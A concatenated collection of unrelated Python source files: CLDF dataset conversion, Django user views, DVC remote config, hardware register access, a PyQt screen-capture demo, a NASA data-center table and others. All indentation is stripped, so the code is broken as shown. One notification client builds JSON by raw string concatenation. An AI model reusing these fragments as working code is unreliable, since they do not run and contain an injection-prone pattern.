return '{} with {}'.format(primary, secondary)
else:
return primary or secondary
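# Worked example (hypothetical author list):
#   authors_string([{'name': 'A. Author'}, {'name': 'B. Helper', 'primary': False}, 'C. Author'])
#   -> 'A. Author and C. Author with B. Helper'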
class Dataset(BaseDataset):
dir = pathlib.Path(__file__).parent
id = "teanu"
def cldf_specs(self): # A dataset must declare all CLDF sets it creates.
return CLDFSpec(
dir=self.cldf_dir,
module='Dictionary',
metadata_fname='cldf-metadata.json')
def cmd_download(self, args):
"""
Download files to the raw/ directory. You can use helpers methods of `self.raw_dir`, e.g.
>>> self.raw_dir.download(url, fname)
"""
pass
def cmd_makecldf(self, args):
"""
Convert the raw data to a CLDF dataset.
>>> args.writer.objects['LanguageTable'].append(...)
"""
# read data
md = self.etc_dir.read_json('md.json')
properties = md.get('properties') or {}
language_name = md['language']['name']
isocode = md['language']['isocode']
language_id = md['language']['isocode']
glottocode = md['language']['glottocode']
marker_map = ChainMap(
properties.get('marker_map') or {},
sfm2cldf.DEFAULT_MARKER_MAP)
entry_sep = properties.get('entry_sep') or sfm2cldf.DEFAULT_ENTRY_SEP
sfm = SFM(
self.raw_dir / 'db.sfm',
marker_map=marker_map,
entry_sep=entry_sep)
examples = sfm2cldf.load_examples(self.raw_dir / 'examples.sfm')
if (self.raw_dir / 'sources.bib').exists():
sources = parse_string(self.raw_dir.read('sources.bib'), 'bibtex')
else:
sources = None
if (self.etc_dir / 'cdstar.json').exists():
media_catalog = self.etc_dir.read_json('cdstar.json')
else:
media_catalog = {}
# preprocessing
sfm.visit(prepreprocess)
sfm = reorganize(sfm)
sfm.visit(preprocess)
# processing
with open(self.dir / 'cldf.log', 'w', encoding='utf-8') as log_file:
log_name = '%s.cldf' % language_id
cldf_log = sfm2cldf.make_log(log_name, log_file)
entries, senses, examples, media = sfm2cldf.process_dataset(
self.id, language_id, properties,
sfm, examples, media_catalog=media_catalog,
glosses_path=self.raw_dir / 'glosses.flextext',
examples_log_path=self.dir / 'examples.log',
glosses_log_path=self.dir / 'glosses.log',
cldf_log=cldf_log)
# Note: If you want to manipulate the generated CLDF tables before
# writing them to disk, this would be a good place to do it.
warn_about_inline_references(
entries, senses, examples, properties, cldf_log)
entries = clean_table(entries)
senses = clean_table(senses)
examples = clean_table(examples)
media = clean_table(media)
# cldf schema
sfm2cldf.make_cldf_schema(
args.writer.cldf, properties,
entries, senses, examples, media)
sfm2cldf.attach_column_titles(args.writer.cldf, properties)
print(file=log_file)
entries = sfm2cldf.ensure_required_columns(
args.writer.cldf, 'EntryTable', entries, cldf_log)
senses = sfm2cldf.ensure_required_columns(
args.writer.cldf, 'SenseTable', senses, cldf_log)
examples = sfm2cldf.ensure_required_columns(
args.writer.cldf, 'ExampleTable', examples, cldf_log)
media = sfm2cldf.ensure_required_columns(
args.writer.cldf, 'media.csv', media, cldf_log)
entries = sfm2cldf.remove_senseless_entries(
senses, entries, cldf_log)
# output
if sources:
args.writer.cldf.add_sources(sources)
args.writer.cldf.properties['dc:creator'] = authors_string(
md.get('authors') or ())
language = {
'ID': language_id,
'Name': language_name,
'ISO639P3code': isocode,
'Glottocode': glottocode,
}
args.writer.objects['LanguageTable'] = [language]
args.writer.objects['EntryTable'] = entries
args.writer.objects['SenseTable'] = senses
args.writer.objects['ExampleTable'] = examples
args.writer.objects['media.csv'] = media
|
python
|
import json
import requests
from django.conf import settings
DEBUG = getattr(settings, 'DEBUG')
class AppleService(object):
def __init__(self, base_url):
self.base_url = base_url
def notify_all(self, resources, message):
for resource in resources:
data = '{"resource": "' + resource + '", "message": "' + message + '"}'
self._send("/notification/all", data)
def notify_user(self, user, resources, message):
for resource in resources:
data = '{"owner": "' + user + '", "resource": "' + resource + '", "message": "' + message + '"}'
self._send("/notification", data)
def notify_users(self, users, resources, message):
for user in users:
self.notify_user(user, resources, message)
def notify_end_users(self, users, resources, message):
if users:
self.notify_users(users, resources, message)
else:
self.notify_all(resources, message)
def _send(self, relative_url, data):
url = self.base_url + relative_url
r = requests.put(url, data)
if DEBUG:
f = open('log.html', 'w')
f.write(r.text)
f.close()
def get_registered_users(self):
url = self.base_url + "/pii/registeredusers"
r = requests.get(url)
if r.status_code != requests.codes.ok:
return
dictionary = r.json()
return dictionary.get("owners")
|
python
|
from keepkeylib.client import proto, BaseClient, ProtocolMixin
from ..trezor.clientbase import TrezorClientBase
class KeepKeyClient(TrezorClientBase, ProtocolMixin, BaseClient):
def __init__(self, transport, handler, plugin):
BaseClient.__init__(self, transport)
ProtocolMixin.__init__(self, transport)
TrezorClientBase.__init__(self, handler, plugin, proto)
def recovery_device(self, *args):
ProtocolMixin.recovery_device(self, False, *args)
TrezorClientBase.wrap_methods(KeepKeyClient)
|
python
|
userInput = '12'            # user input arrives as a string
userInput = int(userInput)  # convert to an integer before numeric use
print(userInput)
|
python
|
import json
import os
from typing import Any, Dict, List, Union
here = os.path.abspath(os.path.dirname(__file__))
def _load_list(paths: List[str]) -> dict:
content: Dict[str, Any] = {}
for p in paths:
with open(p) as h:
t = json.load(h)
content.update(t)
return content
def load_json(path_or_dir: Union[str, List[str]]) -> dict:
path_error = (
"replacy.db.load_json expects a valid path to a json file, "
"a list of (valid) paths to json files, "
"or the (valid) path to a directory with json files"
f", but received {path_or_dir}"
)
if type(path_or_dir) == str:
json_path = str(path_or_dir) # make mypy happy
if (
os.path.exists(json_path)
and os.path.isfile(json_path)
and json_path[-5:] == ".json"
):
with open(json_path) as h:
content = json.load(h)
elif os.path.isdir(json_path):
paths = [
os.path.join(json_path, f)
for f in os.listdir(json_path)
if f.endswith(".json")
]
content = _load_list(paths)
else:
raise ValueError(path_error)
elif type(path_or_dir) == list:
paths = list(path_or_dir) # for mypy
content = _load_list(paths)
else:
raise TypeError(path_error)
return content
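# Hypothetical usage: load_json("rules/") merges every *.json file directly inside the
# directory into one dict, load_json(["a.json", "b.json"]) merges the listed files,
# and load_json("match_dict.json") loads a single file.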
def get_forms_lookup(forms_path="resources/forms_lookup.json"):
matches_path = os.path.join(here, forms_path)
return load_json(matches_path)
def get_match_dict(match_path="resources/match_dict.json"):
matches_path = os.path.join(here, match_path)
return load_json(matches_path)
def get_match_dict_schema(schema_path="resources/match_dict_schema.json"):
full_schema_path = os.path.join(here, schema_path)
return load_json(full_schema_path)
def get_patterns_test_data(data_path="resources/patterns_test_data.json"):
test_data_path = os.path.join(here, data_path)
return load_json(test_data_path)
def load_lm(model_path):
import kenlm
return kenlm.Model(model_path)
|
python
|
'''
Copyright (c) 2018 Modul 9/HiFiBerry
2020 Christoffer Sawicki
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import time
import logging
import struct
from threading import Thread
from hifiberrydsp.filtering.volume import percent2amplification
from hifiberrydsp import datatools
try:
from hifiberrydsp.hardware.adau145x import Adau145x
from hifiberrydsp.hardware.spi import SpiHandler
# depends on spidev and is not required to run tests
except:
pass
class SoundSync(Thread):
'''
Implements reverse-engineered LG Sound Sync to set main volume control
'''
def __init__(self):
self.dsp = Adau145x
self.spi = SpiHandler
self.finished = False
self.detected = False
self.volume_register = None
self.spdif_active_register = None
Thread.__init__(self)
def set_registers(self, volume_register, spdif_active_register):
logging.info("LG Sound Sync: Using volume register at %s and SPDIF active register at %s",
volume_register, spdif_active_register)
self.volume_register = volume_register
self.spdif_active_register = spdif_active_register
def update_volume(self):
if self.volume_register is None:
return False
if (self.spdif_active_register is not None) and (not self.is_spdif_active()):
return False
volume = self.try_read_volume()
if volume is None:
return False
self.write_volume(volume)
return True
def is_spdif_active(self):
if self.spdif_active_register is None:
return True
data = self.spi.read(self.spdif_active_register, 4)
[spdif_active] = struct.unpack(">l", data)
return spdif_active != 0
def try_read_volume(self):
spdif_status_register = 0xf617
return self.parse_volume_from_status(self.spi.read(spdif_status_register, 5))
# Volume ~~~~~
# 0: 00f048a$ This is what the SPDIF status registers look like with different volume levels set.
# 1: 01f048a$
# 2: 02f048a$ We check for f048a (SIGNATURE_VALUE) to see if LG Sound Sync is enabled.
# 3: 03f048a$
# 100: 64f048a$ The byte to the left is the volume we want to extract.
# ~~ The first bit is set to 1 when muted.
SIGNATURE_MASK = 0xfffff
SIGNATURE_VALUE = 0xf048a
SHIFT = 5 * 4
MUTE_MASK = 0b10000000
VOLUME_MASK = 0b01111111
@staticmethod
def parse_volume_from_status(data):
bits = int.from_bytes(data, byteorder="big")
if bits & SoundSync.SIGNATURE_MASK != SoundSync.SIGNATURE_VALUE:
return None
if bits >> SoundSync.SHIFT & SoundSync.MUTE_MASK:
return 0
return bits >> SoundSync.SHIFT & SoundSync.VOLUME_MASK
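# Worked example: a raw read of b'\x00\x06\x4f\x04\x8a' is 0x00064f048a, whose low
# 20 bits match SIGNATURE_VALUE and whose volume byte is 0x64, so
# parse_volume_from_status(bytes.fromhex("00064f048a")) returns 100; with the mute
# bit set (bytes.fromhex("000e4f048a")) it returns 0.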
def write_volume(self, volume):
assert 0 <= volume <= 100
dspdata = datatools.int_data(self.dsp.decimal_repr(percent2amplification(volume)),
self.dsp.WORD_LENGTH)
self.spi.write(self.volume_register, dspdata)
POLL_INTERVAL = 0.3
def run(self):
try:
while not self.finished:
previously_detected = self.detected
self.detected = self.update_volume()
if not previously_detected and self.detected:
logging.info("LG Sound Sync started")
elif previously_detected and not self.detected:
logging.info("LG Sound Sync stopped")
if self.detected:
time.sleep(self.POLL_INTERVAL)
else:
time.sleep(self.POLL_INTERVAL * 10)
except Exception:
logging.exception("LG Sound Sync crashed")
def finish(self):
self.finished = True
|
python
|
# Module fwpd_histogram
import ctypes as ct
import time
from modules.example_helpers import *
def enable_characterization(ADQAPI, adq_cu, adq_num, channel, enable, only_metadata):
# Enable logic and release reset
assert (channel < 5 and channel > 0), "Channel must be between 1-4."
# Lookup base address for histogram setup registers
base_addr = (channel-1) * (2**(21-2-2)) + 1*(2**(21-2-4))
# Pull reset (create a negedge)
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffffd, 0x00000002, 0)
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffffd, 0x00000000, 0)
# Enable characterization if 'enable' is True
if enable:
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffff9, 0x00000002, 0)
else:
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffff9, 0x00000006, 0)
# Enable metadata mode if 'only_metadata' is True
if only_metadata:
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffff7, 0x00000008, 0)
else:
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffff7, 0x00000000, 0)
# Strobe register load bit (for enable)
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffffe, 0x00000001, 0)
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffffe, 0x00000000, 0)
def _setup(ADQAPI, adq_cu, adq_num, base_addr, scale, offset):
# Set histogram bin scaling
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0x00000000, scale, 0)
# Set histogram bin offset
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr+1, 0x00000000, offset, 0)
def _reset(ADQAPI, adq_cu, adq_num, base_addr, hist_size):
# Write zero to all bins
if ADQAPI.ADQ_IsUSB3Device(adq_cu, adq_num):
zero_block = (ct.c_uint32*hist_size)()
ct.memset(ct.byref(zero_block), 0, ct.sizeof(zero_block))  # zero all hist_size 32-bit words
status = ADQAPI.ADQ_WriteBlockUserRegister(adq_cu, adq_num, 2, base_addr, ct.byref(zero_block), hist_size*4, 1)
print('ADQAPI.ADQ_WriteBlockUserRegister returned {}'.format(adq_status(status)))
else:
for idx in range(hist_size):
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr+idx, 0x0, 0x0, 0)
def _fetch(ADQAPI, adq_cu, adq_num, base_addr, hist_size):
# Fetch data from histogram memory
hist = (ct.c_uint32*hist_size)()
if ADQAPI.ADQ_IsUSB3Device(adq_cu, adq_num):
ADQAPI.ADQ_ReadBlockUserRegister(adq_cu, adq_num, 2, base_addr, ct.byref(hist), hist_size*4, 1)
else:
value = ct.c_uint32()
for idx in range(hist_size):
ADQAPI.ADQ_ReadUserRegister(adq_cu, adq_num, 2, base_addr+idx, ct.byref(value))
hist[idx] = value.value
return hist
def _get_mem_base(channel, hist_type):
# Lookup base address for histogram memory
assert (channel < 5 and channel > 0), "Channel must be between 1-4."
if (hist_type == 'tot'):
return (channel-1) * (2**(21-2-2)) + 2*(2**(21-2-4))
if (hist_type == 'extr'):
return (channel-1) * (2**(21-2-2)) + 3*(2**(21-2-4))
else:
assert False, "Unknown hist_type {}.".format(hist_type)
def _get_setup_base(channel, hist_type):
# Lookup base address for histogram setup registers
assert (channel < 5 and channel > 0), "Channel must be between 1-4."
if (hist_type == 'tot'):
return (channel-1) * (2**(21-2-2)) + 1*(2**(21-2-4)) + 1
if (hist_type == 'extr'):
return (channel-1) * (2**(21-2-2)) + 1*(2**(21-2-4)) + 4
else:
assert False, "Unknown hist_type {}.".format(hist_type)
def _get_hist_size(hist_type):
# Lookup histogram size
if (hist_type == 'tot'):
# TOT histogram is 16k+3 bins
return 1024*16+3
if (hist_type == 'extr'):
# Extreme-value histogram is 4k+3 bins
return 1024*4+3
else:
assert False, "Unknown hist_type {}.".format(hist_type)
def setup_tot(ADQAPI, adq_cu, adq_num, channel, scale, offset):
return _setup(ADQAPI, adq_cu, adq_num, _get_setup_base(channel, 'tot'), scale, offset)
def setup_extr(ADQAPI, adq_cu, adq_num, channel, scale, offset):
return _setup(ADQAPI, adq_cu, adq_num, _get_setup_base(channel, 'extr'), scale, offset)
def reset_tot(ADQAPI, adq_cu, adq_num, channel):
return _reset(ADQAPI, adq_cu, adq_num, _get_mem_base(channel, 'tot'), _get_hist_size('tot'))
def reset_extr(ADQAPI, adq_cu, adq_num, channel):
return _reset(ADQAPI, adq_cu, adq_num, _get_mem_base(channel, 'extr'), _get_hist_size('extr'))
def fetch_tot(ADQAPI, adq_cu, adq_num, channel):
return _fetch(ADQAPI, adq_cu, adq_num, _get_mem_base(channel, 'tot'), _get_hist_size('tot'))
def fetch_extr(ADQAPI, adq_cu, adq_num, channel):
return _fetch(ADQAPI, adq_cu, adq_num, _get_mem_base(channel, 'extr'), _get_hist_size('extr'))
|
python
|
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
#
import pytest
import mlos.global_values
from mlos.OptimizerEvaluationTools.ObjectiveFunctionFactory import ObjectiveFunctionFactory, objective_function_config_store
from mlos.Optimizers.RegressionModels.GoodnessOfFitMetrics import DataSetType
from mlos.Optimizers.RegressionModels.LassoCrossValidatedConfigStore import lasso_cross_validated_config_store
from mlos.Optimizers.RegressionModels.LassoCrossValidatedRegressionModel import LassoCrossValidatedRegressionModel
from mlos.Optimizers.RegressionModels.MultiObjectiveLassoCrossValidated import MultiObjectiveLassoCrossValidated
from mlos.Logger import create_logger
class TestMultiObjectiveLassoCrossValidated:
@classmethod
def setup_class(cls) -> None:
mlos.global_values.declare_singletons()
cls.logger = create_logger("TestMultiObjectiveLassoCrossValidated")
@pytest.mark.parametrize('objective_function_config_name', ["2d_hypersphere_minimize_some", "10d_hypersphere_minimize_some", "5_mutually_exclusive_polynomials"])
def test_default_config(self, objective_function_config_name):
objective_function_config = objective_function_config_store.get_config_by_name(objective_function_config_name)
objective_function = ObjectiveFunctionFactory.create_objective_function(objective_function_config)
lasso_model_config = lasso_cross_validated_config_store.default
multi_objective_rf = MultiObjectiveLassoCrossValidated(
model_config=lasso_model_config,
input_space=objective_function.parameter_space,
output_space=objective_function.output_space,
logger=self.logger
)
if objective_function_config_name == '2d_hypersphere_minimize_some':
num_training_samples = 25
num_testing_samples = 10
elif objective_function_config_name == '10d_hypersphere_minimize_some':
num_training_samples = 50
num_testing_samples = 10
elif objective_function_config_name == '5_mutually_exclusive_polynomials':
num_training_samples = 100
num_testing_samples = 50
else:
assert False
train_params_df = objective_function.parameter_space.random_dataframe(num_samples=num_training_samples)
train_objectives_df = objective_function.evaluate_dataframe(train_params_df)
test_params_df = objective_function.parameter_space.random_dataframe(num_samples=num_testing_samples)
test_objectives_df = objective_function.evaluate_dataframe(test_params_df)
multi_objective_rf.fit(features_df=train_params_df, targets_df=train_objectives_df, iteration_number=num_training_samples)
multi_objective_predictions = multi_objective_rf.predict(features_df=train_params_df, include_only_valid_rows=True)
# TRAINING DATA
#
print("------------------------------------------------------------------------------------")
print("--------------------------------------- TRAIN --------------------------------------")
print("------------------------------------------------------------------------------------")
training_gof = multi_objective_rf.compute_goodness_of_fit(features_df=train_params_df, targets_df=train_objectives_df, data_set_type=DataSetType.TRAIN)
for objective_name in objective_function.output_space.dimension_names:
print("------------------------------------------------------------------------------------")
print(objective_name)
print(training_gof[objective_name].to_json(indent=2))
# TESTING DATA
print("------------------------------------------------------------------------------------")
print("--------------------------------------- TEST ---------------------------------------")
print("------------------------------------------------------------------------------------")
testing_gof = multi_objective_rf.compute_goodness_of_fit(features_df=test_params_df, targets_df=test_objectives_df, data_set_type=DataSetType.TEST_KNOWN_RANDOM)
for objective_name in objective_function.output_space.dimension_names:
print("------------------------------------------------------------------------------------")
print(objective_name)
print(testing_gof[objective_name].to_json(indent=2))
|
python
|
from allauth.account import signals
from allauth.account.views import SignupView
from allauth.account.utils import send_email_confirmation
from allauth.exceptions import ImmediateHttpResponse
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.http import HttpRequest, HttpResponseRedirect
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from django.views.generic import (
CreateView,
DeleteView,
DetailView,
ListView,
RedirectView,
UpdateView,
)
from arike.facilities.models import Facility
from arike.users.forms import UserForm, UserSignupForm
from arike.users.models import UserRoles
User = get_user_model()
class AdminAuthMixin(LoginRequiredMixin, UserPassesTestMixin):
def test_func(self):
return self.request.user.role == UserRoles.DISTRICT_ADMIN
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
slug_field = "username"
slug_url_kwarg = "username"
user_detail_view = UserDetailView.as_view()
class UserFormView(AdminAuthMixin):
form_class = UserForm
template_name = "users/user_form.html"
slug_field = "username"
slug_url_kwarg = "username"
def get_queryset(self):
district = self.request.user.facility.ward.lsg_body.district
users = User.objects.filter(
deleted=False, facility__ward__lsg_body__district=district
).exclude(role=UserRoles.DISTRICT_ADMIN)
return users
def get_success_url(self):
return "/users/list/"
class NurseSignUpView(AdminAuthMixin, SignupView):
form_class = UserSignupForm
template_name = "users/user_form.html"
slug_field = "username"
slug_url_kwarg = "username"
def get_success_url(self):
return "/users/list/"
def form_valid(self, form):
self.user = form.save(self.request)
try:
signals.user_signed_up.send(
sender=self.user.__class__, request=self.request, user=self.user, **{}
)
send_email_confirmation(self.request, self.user, True)
return HttpResponseRedirect(self.get_success_url())
except ImmediateHttpResponse as e:
return e.response
class NurseDeleteView(UserFormView, DeleteView):
def delete(self, request: HttpRequest, *args: str, **kwargs):
self.object = self.get_object()
success_url = self.get_success_url()
self.object.deleted = True
self.object.save()
return HttpResponseRedirect(success_url)
class NurseUpdateView(UserFormView, UpdateView):
pass
class UserListVeiw(AdminAuthMixin, ListView):
model = User
template_name = "users/list.html"
context_object_name = "users"
def get_queryset(self):
district = self.request.user.facility.ward.lsg_body.district
users = User.objects.filter(
deleted=False, facility__ward__lsg_body__district=district
).exclude(role=UserRoles.DISTRICT_ADMIN)
search_filter = self.request.GET.get("search")
role_filter = self.request.GET.get("role")
facility_filter = self.request.GET.get("facility")
if search_filter is not None:
users = users.filter(name__icontains=search_filter)
if role_filter is not None:
users = users.filter(role=role_filter)
if facility_filter is not None:
users = users.filter(facility=facility_filter)
return users
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
district = self.request.user.facility.ward.lsg_body.district
ctx["facilities"] = Facility.objects.filter(ward__lsg_body__district=district)
return ctx
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = User
fields = ["name", "email", "phone", "facility"]
success_message = _("Information successfully updated")
def get_success_url(self):
assert (
self.request.user.is_authenticated
) # for mypy to know that the user is authenticated
return self.request.user.get_absolute_url()
def get_object(self):
return self.request.user
user_update_view = UserUpdateView.as_view()
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail", kwargs={"username": self.request.user.username})
user_redirect_view = UserRedirectView.as_view()
|
python
|
# encoding: utf-8
import sys
from PyQt5 import QtQuick
from PyQt5.QtCore import QObject, pyqtSlot, QTimer
from PyQt5.QtGui import QIcon
from PyQt5.QtQml import QQmlApplicationEngine
from PyQt5.QtWidgets import QWidget, QApplication, QLabel
from resources import resources
print(QtQuick)
print(resources)
class MyAppMainWindow(QWidget):
def __init__(self):
super(MyAppMainWindow, self).__init__()
self.initUI()
def initUI(self):
##
self.resize(800, 600)
##
self.label = QLabel(self)
self.label.setText("哈哈哈哈")
##
screen = QApplication.primaryScreen()
qpixmap = screen.grabWindow(0)
print(qpixmap)
self.label.setPixmap(qpixmap)
##
self.setWindowTitle("My First PyQt5 App")
self.setWindowIcon(QIcon('icon.ico'))
#
self.show()
class ScreenCaptureWindow(QWidget):
def __init__(self):
super(ScreenCaptureWindow, self).__init__()
self.index = 0
self.resize(800, 600)
self.setWindowTitle("录屏实况")
self.label = QLabel(self)
self.timer = QTimer()
self.timer.timeout.connect(self.capture_screen)
self.capture_screen()
def capture_screen(self):
self.index += 1
screen = QApplication.primaryScreen()
screen_img = screen.grabWindow(0)
self.label.setPixmap(screen_img)
print(screen_img)
print("截图:" + str(self.index))
def capture_screen_start(self):
self.show()
self.timer.start(100)
def capture_screen_stop(self):
self.hide()
self.timer.stop()
class MyClass(QObject):
def __init__(self):
super(MyClass, self).__init__()
self.scw = ScreenCaptureWindow()
@pyqtSlot(str)
def screen_capture_start(self):
self.scw.capture_screen_start()
@pyqtSlot(str)
def screen_capture_stop(self):
self.scw.capture_screen_stop()
if __name__ == "__main__":
app = QApplication(sys.argv)
engine = QQmlApplicationEngine()
# engine.load("resources/qmls/app_main_window.qml")
# engine.load(QUrl("qrc:/resources/qmls/app_main_window.qml"))
engine.load(":/resources/qmls/app_main_window.qml")
con = MyClass()
context = engine.rootContext()
context.setContextProperty("con", con)
# myApp = MyAppMainWindow()
sys.exit(app.exec_())
|
python
|
import logging
import os
import posixpath
from dvc.config import Config
from dvc.config import ConfigError
from dvc.utils import relpath
from dvc.utils.compat import urlparse
logger = logging.getLogger(__name__)
class RemoteConfig(object):
def __init__(self, config):
self.config = config
def get_settings(self, name):
"""
Args:
name (str): The name of the remote that we want to retrieve
Returns:
dict: The content beneath the given remote name.
Example:
>>> config = {'remote "server"': {'url': 'ssh://localhost/'}}
>>> get_settings("server")
{'url': 'ssh://localhost/'}
"""
settings = self.config.config.get(
Config.SECTION_REMOTE_FMT.format(name.lower())
)
if settings is None:
raise ConfigError(
"unable to find remote section '{}'".format(name)
)
parsed = urlparse(settings["url"])
# Support for cross referenced remotes.
# This will merge the settings, giving priority to the outer reference.
# For example, having:
#
# dvc remote add server ssh://localhost
# dvc remote modify server user root
# dvc remote modify server ask_password true
#
# dvc remote add images remote://server/tmp/pictures
# dvc remote modify images user alice
# dvc remote modify images ask_password false
# dvc remote modify images password asdf1234
#
# Results on a config dictionary like:
#
# {
# "url": "ssh://localhost/tmp/pictures",
# "user": "alice",
# "password": "asdf1234",
# "ask_password": False,
# }
#
if parsed.scheme == "remote":
reference = self.get_settings(parsed.netloc)
url = posixpath.join(reference["url"], parsed.path.lstrip("/"))
merged = reference.copy()
merged.update(settings)
merged["url"] = url
return merged
return settings
@staticmethod
def resolve_path(path, config_file):
"""Resolve path relative to config file location.
Args:
path: Path to be resolved.
config_file: Path to config file, which `path` is specified
relative to.
Returns:
Path relative to the `config_file` location. If `path` is an
absolute path then it will be returned without change.
"""
if os.path.isabs(path):
return path
return relpath(path, os.path.dirname(config_file))
def add(self, name, url, default=False, force=False, level=None):
from dvc.remote import _get, RemoteLOCAL
configobj = self.config.get_configobj(level)
remote = _get({Config.SECTION_REMOTE_URL: url})
if remote == RemoteLOCAL and not url.startswith("remote://"):
url = self.resolve_path(url, configobj.filename)
self.config.set(
Config.SECTION_REMOTE_FMT.format(name),
Config.SECTION_REMOTE_URL,
url,
force=force,
level=level,
)
if default:
logger.info("Setting '{}' as a default remote.".format(name))
self.config.set(
Config.SECTION_CORE,
Config.SECTION_CORE_REMOTE,
name,
level=level,
)
def remove(self, name, level=None):
self.config.unset(Config.SECTION_REMOTE_FMT.format(name), level=level)
if level is None:
level = Config.LEVEL_REPO
for lev in [
Config.LEVEL_LOCAL,
Config.LEVEL_REPO,
Config.LEVEL_GLOBAL,
Config.LEVEL_SYSTEM,
]:
self.config.unset(
Config.SECTION_CORE,
Config.SECTION_CORE_REMOTE,
level=lev,
force=True,
)
if lev == level:
break
def modify(self, name, option, value, level=None):
self.config.set(
Config.SECTION_REMOTE_FMT.format(name), option, value, level=level
)
def list(self, level=None):
return self.config.list_options(
Config.SECTION_REMOTE_REGEX, Config.SECTION_REMOTE_URL, level=level
)
def set_default(self, name, unset=False, level=None):
if unset:
self.config.unset(Config.SECTION_CORE, Config.SECTION_CORE_REMOTE)
return
self.config.set(
Config.SECTION_CORE, Config.SECTION_CORE_REMOTE, name, level=level
)
|
python
|
# DAACS ~= NASA Earthdata data centers
DAACS = [
{
"short-name": "NSIDC",
"name": "National Snow and Ice Data Center",
"homepage": "https://nsidc.org",
"cloud-providers": ["NSIDC_CPRD"],
"on-prem-providers": ["NSIDC_ECS"],
"s3-credentials": "https://data.nsidc.earthdatacloud.nasa.gov/s3credentials",
},
{
"short-name": "GHRC DAAC",
"name": "Global Hydrometeorology Resource Center",
"homepage": "https://ghrc.nsstc.nasa.gov/home/",
"cloud-providers": ["GHRC_DAAC"],
"on-prem-providers": ["GHRC_DAAC"],
"s3-credentials": "https://data.ghrc.earthdata.nasa.gov/s3credentials",
},
{
"short-name": "PO DAAC",
"name": "Physical Oceanography Distributed Active Archive Center",
"homepage": "https://podaac.jpl.nasa.gov",
"cloud-providers": ["POCLOUD"],
"on-prem-providers": ["PODAAC"],
"s3-credentials": "https://archive.podaac.earthdata.nasa.gov/s3credentials",
},
{
"short-name": "ASF",
"name": "Alaska Satellite Facility",
"homepage": "https://asf.alaska.edu",
"cloud-providers": ["ASF"],
"on-prem-providers": ["ASF"],
"s3-credentials": "",
},
{
"short-name": "ORNL DAAC",
"name": "Oak Ridge National Laboratory",
"homepage": "https://daac.ornl.gov",
"cloud-providers": ["ORNL_CLOUD"],
"on-prem-providers": ["ORNL_DAAC"],
"s3-credentials": "https://data.ornldaac.earthdata.nasa.gov/s3credentials",
},
{
"short-name": "LP DAAC",
"name": " Land Processes Distributed Active Archive Center",
"homepage": "https://lpdaac.usgs.gov",
"cloud-providers": ["LPCLOUD"],
"on-prem-providers": ["LPDAAC_ECS"],
"s3-credentials": "https://data.lpdaac.prod.earthdatacloud.nasa.gov/s3credentials",
},
{
"short-name": "GES DISC",
"name": "NASA Goddard Earth Sciences (GES) Data and Information Services Center (DISC)",
"homepage": "https://daac.gsfc.nasa.gov",
"cloud-providers": ["GES_DISC"],
"on-prem-providers": ["GES_DISC"],
"s3-credentials": "",
},
{
"short-name": "OB DAAC",
"name": "NASA's Ocean Biology Distributed Active Archive Center",
"homepage": "https://earthdata.nasa.gov/eosdis/daacs/obdaac",
"cloud-providers": [],
"on-prem-providers": ["OB_DAAC"],
"s3-credentials": "",
},
{
"short-name": "SEDAC",
"name": "NASA's Socioeconomic Data and Applications Center",
"homepage": "https://earthdata.nasa.gov/eosdis/daacs/sedac",
"cloud-providers": [],
"on-prem-providers": ["SEDAC"],
"s3-credentials": "",
},
]
CLOUD_PROVIDERS = [
"GES_DISC",
"LPCLOUD",
"NSIDC_CPRD",
"POCLOUD",
"ASF",
"GHRC_DAAC",
"ORNL_CLOUD",
]
|
python
|
from tkinter import *
from SMExp import *
from DMExp import *
import pygame
import re
import time
import random
class SMPage(Frame):
MUTE = False
INFO = False
DIM = 0
def __init__(self, parent, controller):
Frame.__init__(self, parent)
pygame.mixer.init()
SGMWall = PhotoImage(file="TwoDimension.png")
SGLabel = Label(self, image=SGMWall)
SGLabel.image = SGMWall
SGLabel.place(x=-2, y=-2)
Info = PhotoImage(file="InfoPopOne.png")
InfoPop = Label(self, image=Info)
InfoPop.image = Info
InfoPop.place(x=-2, y=-2)
InfoPop.lower()
Back = PhotoImage(file="DisneyBackbutton.png")
BackBtn = Button(self, image=Back, bd=0, bg='#182b3a', command=lambda: BackAct())
